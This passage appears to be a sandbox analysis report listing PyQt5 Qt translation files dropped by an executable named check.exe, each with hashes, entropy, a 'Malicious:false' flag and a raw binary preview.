                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                                                      MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                                                      SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                                                      SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                                                      SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_gd.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                      Entropy (8bit):4.463523104731333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                                                      MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                                                      SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                                                      SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                                                      SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_gl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):323590
                                                                                                                                                                                                                                      Entropy (8bit):4.568068046062524
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                                                      MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                                                      SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                                                      SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                                                      SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_he.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                                      Entropy (8bit):3.880645689209568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                                                      MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                                                      SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                                                      SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                                                      SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8743
                                                                                                                                                                                                                                      Entropy (8bit):5.189558605179696
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                                                      MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                                                      SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                                                      SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                                                      SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10599
                                                                                                                                                                                                                                      Entropy (8bit):5.192287379770591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                                                      MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                                                      SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                                                      SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                                                      SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7444
                                                                                                                                                                                                                                      Entropy (8bit):4.580794980254807
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                                                      MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                                                      SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                                                      SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                                                      SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):15297
                                                                                                                                                                                                                                      Entropy (8bit):4.708378368926237
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                                                      MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                                                      SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                                                      SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                                                      SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4795
                                                                                                                                                                                                                                      Entropy (8bit):4.530246422531362
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                                                      MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                                                      SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                                                      SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                                                      SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7570
                                                                                                                                                                                                                                      Entropy (8bit):4.550982634910665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                                                      MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                                                      SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                                                      SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                                                      SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10704
                                                                                                                                                                                                                                      Entropy (8bit):4.481291573289571
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                                                      MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                                                      SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                                                      SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                                                      SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10922
                                                                                                                                                                                                                                      Entropy (8bit):4.459946393010639
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                                                      MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                                                      SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                                                      SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                                                      SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_gl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10891
                                                                                                                                                                                                                                      Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                                                      MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                                                      SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                                                      SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                                                      SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\translations\qt_help_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10284
                                                                                                                                                                                                                                      Entropy (8bit):4.674501432335502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
